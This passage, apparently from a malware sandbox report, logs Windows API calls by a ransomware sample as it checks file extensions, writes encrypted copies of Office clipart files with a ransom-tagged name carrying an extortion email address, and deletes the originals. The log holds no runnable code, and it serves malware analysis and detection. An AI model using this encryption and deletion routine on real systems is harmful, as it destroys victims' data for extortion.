lpString2=".WMF") returned -1 [0065.509] lstrlenW (lpString=".docx") returned 5 [0065.509] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.509] lstrlenW (lpString=".pdf") returned 4 [0065.509] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.509] lstrlenW (lpString=".xls") returned 4 [0065.509] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.509] lstrlenW (lpString=".xlsx") returned 5 [0065.509] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.509] lstrlenW (lpString=".ppt") returned 4 [0065.509] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 68 [0065.509] lstrlenW (lpString=".zip") returned 4 [0065.509] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.509] lstrlenW (lpString=".rar") returned 4 [0065.509] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.509] lstrlenW (lpString=".bz2") returned 4 [0065.509] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.509] lstrlenW (lpString=".7z") returned 3 [0065.509] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 68 [0065.509] lstrlenW (lpString=".dbf") returned 4 [0065.509] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 68 [0065.509] lstrlenW (lpString=".1cd") returned 4 [0065.509] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 68 [0065.510] lstrlenW (lpString=".jpg") returned 4 [0065.510] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.511] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.511] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.511] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00320_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0065.511] GetLastError () returned 0x0 [0065.511] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x2e0, lpOverlapped=0x0) returned 1 [0065.540] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x2f0, lpOverlapped=0x0) returned 1 [0065.542] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.542] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.542] SetEndOfFile (hFile=0x340) returned 1 [0065.542] CloseHandle (hObject=0x340) returned 1 [0065.543] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.543] SetEndOfFile (hFile=0x350) returned 1 [0065.544] CloseHandle (hObject=0x350) returned 1 [0065.544] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.544] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00320_.wmf")) returned 1 [0065.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 68 [0065.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 68 [0065.545] lstrlenW (lpString=".doc") returned 4 [0065.545] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.545] lstrlenW (lpString=".docx") returned 5 [0065.545] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.545] lstrlenW (lpString=".pdf") returned 4 [0065.545] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.545] lstrlenW (lpString=".xls") returned 4 [0065.545] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.545] lstrlenW (lpString=".xlsx") returned 5 [0065.545] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.545] lstrlenW (lpString=".ppt") returned 4 [0065.545] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 68 [0065.545] lstrlenW (lpString=".zip") returned 4 [0065.545] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.545] lstrlenW (lpString=".rar") returned 4 [0065.545] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.545] lstrlenW (lpString=".bz2") returned 4 [0065.545] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.545] lstrlenW (lpString=".7z") returned 3 [0065.545] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 68 [0065.545] lstrlenW (lpString=".dbf") returned 4 [0065.545] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 68 [0065.546] lstrlenW (lpString=".1cd") returned 4 [0065.546] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 68 [0065.546] lstrlenW (lpString=".jpg") returned 4 [0065.546] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.546] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.546] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.546] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00397_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0065.547] GetLastError () returned 0x0 [0065.547] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x439c, lpOverlapped=0x0) returned 1 [0065.549] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x43a0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x43a0, lpOverlapped=0x0) returned 1 [0065.550] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.550] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.550] SetEndOfFile (hFile=0x340) returned 1 [0065.550] CloseHandle (hObject=0x340) returned 1 [0065.552] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.552] SetEndOfFile (hFile=0x350) returned 1 [0065.553] CloseHandle (hObject=0x350) returned 1 [0065.553] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.553] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00397_.wmf")) returned 1 [0065.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 68 [0065.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 68 [0065.554] lstrlenW (lpString=".doc") returned 4 [0065.554] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.554] lstrlenW (lpString=".docx") returned 5 [0065.554] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.554] lstrlenW (lpString=".pdf") returned 4 [0065.554] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.554] lstrlenW (lpString=".xls") returned 4 [0065.554] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.554] lstrlenW (lpString=".xlsx") returned 5 [0065.554] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.554] lstrlenW (lpString=".ppt") returned 4 [0065.554] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 68 [0065.554] lstrlenW (lpString=".zip") returned 4 [0065.554] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.554] lstrlenW (lpString=".rar") returned 4 [0065.554] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.554] lstrlenW (lpString=".bz2") returned 4 [0065.554] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.554] lstrlenW (lpString=".7z") returned 3 [0065.555] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 68 [0065.555] lstrlenW (lpString=".dbf") returned 4 [0065.555] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 68 [0065.555] lstrlenW (lpString=".1cd") returned 4 [0065.555] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 68 [0065.555] lstrlenW (lpString=".jpg") returned 4 [0065.555] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.556] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.556] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.556] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00902_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0065.556] GetLastError () returned 0x0 [0065.556] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x1f08, lpOverlapped=0x0) returned 1 [0065.589] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x1f10, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x1f10, lpOverlapped=0x0) returned 1 [0065.591] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.591] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.591] SetEndOfFile (hFile=0x340) returned 1 [0065.591] CloseHandle (hObject=0x340) returned 1 [0065.592] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.592] SetEndOfFile (hFile=0x350) returned 1 [0065.593] CloseHandle (hObject=0x350) returned 1 [0065.593] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.594] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00902_.wmf")) returned 1 [0065.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 68 [0065.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 68 [0065.594] lstrlenW (lpString=".doc") returned 4 [0065.594] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.594] lstrlenW (lpString=".docx") returned 5 [0065.594] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.594] lstrlenW (lpString=".pdf") returned 4 [0065.594] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.594] lstrlenW (lpString=".xls") returned 4 [0065.594] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.594] lstrlenW (lpString=".xlsx") returned 5 [0065.594] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.595] lstrlenW (lpString=".ppt") returned 4 [0065.595] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 68 [0065.595] lstrlenW (lpString=".zip") returned 4 [0065.595] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.595] lstrlenW (lpString=".rar") returned 4 [0065.595] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.595] lstrlenW (lpString=".bz2") returned 4 [0065.595] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.595] lstrlenW (lpString=".7z") returned 3 [0065.595] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 68 [0065.595] lstrlenW (lpString=".dbf") returned 4 [0065.595] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 68 [0065.595] lstrlenW (lpString=".1cd") returned 4 [0065.595] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 68 [0065.595] lstrlenW (lpString=".jpg") returned 4 [0065.595] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.596] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.596] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.596] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00074_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0065.597] GetLastError () returned 0x0 [0065.597] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x45ba, lpOverlapped=0x0) returned 1 [0065.601] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x45c0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x45c0, lpOverlapped=0x0) returned 1 [0065.602] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.602] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.602] SetEndOfFile (hFile=0x340) returned 1 [0065.603] CloseHandle (hObject=0x340) returned 1 [0065.603] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.604] SetEndOfFile (hFile=0x350) returned 1 [0065.604] CloseHandle (hObject=0x350) returned 1 [0065.605] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.605] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00074_.wmf")) returned 1 [0065.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 68 [0065.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 68 [0065.605] lstrlenW (lpString=".doc") returned 4 [0065.605] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.605] lstrlenW (lpString=".docx") returned 5 [0065.605] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.605] lstrlenW (lpString=".pdf") returned 4 [0065.605] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.605] lstrlenW (lpString=".xls") returned 4 [0065.605] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.605] lstrlenW (lpString=".xlsx") returned 5 [0065.605] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.605] lstrlenW (lpString=".ppt") returned 4 [0065.606] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 68 [0065.606] lstrlenW (lpString=".zip") returned 4 [0065.606] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.606] lstrlenW (lpString=".rar") returned 4 [0065.606] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.606] lstrlenW (lpString=".bz2") returned 4 [0065.606] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.606] lstrlenW (lpString=".7z") returned 3 [0065.606] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 68 [0065.606] lstrlenW (lpString=".dbf") returned 4 [0065.606] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 68 [0065.606] lstrlenW (lpString=".1cd") returned 4 [0065.606] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 68 [0065.606] lstrlenW (lpString=".jpg") returned 4 [0065.606] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.606] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.606] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.606] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00077_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0065.607] GetLastError () returned 0x0 [0065.607] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x7620, lpOverlapped=0x0) returned 1 [0065.608] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x7630, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x7630, lpOverlapped=0x0) returned 1 [0065.609] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.610] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.610] SetEndOfFile (hFile=0x340) returned 1 [0065.610] CloseHandle (hObject=0x340) returned 1 [0065.611] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.611] SetEndOfFile (hFile=0x350) returned 1 [0065.612] CloseHandle (hObject=0x350) returned 1 [0065.612] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.612] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00077_.wmf")) returned 1 [0065.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 68 [0065.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 68 [0065.613] lstrlenW (lpString=".doc") returned 4 [0065.613] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.613] lstrlenW (lpString=".docx") returned 5 [0065.613] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.613] lstrlenW (lpString=".pdf") returned 4 [0065.613] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.613] lstrlenW (lpString=".xls") returned 4 [0065.613] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.613] lstrlenW (lpString=".xlsx") returned 5 [0065.613] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.613] lstrlenW (lpString=".ppt") returned 4 [0065.613] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 68 [0065.613] lstrlenW (lpString=".zip") returned 4 [0065.613] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.613] lstrlenW (lpString=".rar") returned 4 [0065.613] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.613] lstrlenW (lpString=".bz2") returned 4 [0065.613] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.613] lstrlenW (lpString=".7z") returned 3 [0065.613] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 68 [0065.613] lstrlenW (lpString=".dbf") returned 4 [0065.613] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 68 [0065.613] lstrlenW (lpString=".1cd") returned 4 [0065.613] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 68 [0065.613] lstrlenW (lpString=".jpg") returned 4 [0065.613] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.614] 